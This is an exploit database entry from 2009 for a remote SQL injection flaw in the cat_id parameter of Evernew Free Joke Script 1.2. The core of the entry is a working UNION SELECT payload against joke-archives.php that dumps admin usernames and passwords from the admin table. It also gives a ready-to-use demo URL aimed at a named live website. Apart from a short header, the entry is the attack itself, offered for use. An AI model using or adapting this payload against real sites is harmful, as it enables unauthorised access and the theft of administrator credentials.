Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability

2009-05-27T00:00:00
ID 1337DAY-ID-5266
Type zdt
Reporter taRentReXx
Modified 2009-05-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================================
Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability
========================================================================


@[email protected]
@~~=Script   : Evernewjoke Script

@~~=S.Site   : http://www.evernewscripts.com/2009/02/free-joke-script/

@~~=Demo     : http://www.evernewjokes.com/
@[email protected]



@~~=Vul file :joke-archives.php

@~~=Exploit :-

		joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--


		!! DEMO !!:-

		http://www.evernewjokes.com/joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--






#  0day.today [2018-01-08]  #